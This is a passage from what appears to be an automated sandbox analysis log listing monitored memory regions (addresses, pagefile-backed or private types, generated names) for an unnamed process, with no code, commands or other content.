entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19182 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19183 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19186 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19187 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19200 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19201 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19205 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19206 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19207 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19208 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19209 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19210 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19211 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19212 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19246 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19247 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19251 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19252 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19253 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19254 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19255 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19256 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19257 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19258 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19259 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19260 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19261 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19262 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19263 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19264 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19265 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19266 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19267 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19268 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19269 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19294 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19295 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19296 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19304 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19305 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19309 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19310 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19311 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19312 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19313 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19314 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19315 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19316 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19317 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19318 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19319 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19320 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19321 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19322 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19323 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19324 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19325 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19326 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19327 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19328 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19347 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19348 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19352 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19353 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19354 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19355 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19356 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19357 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19358 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19359 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19360 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19361 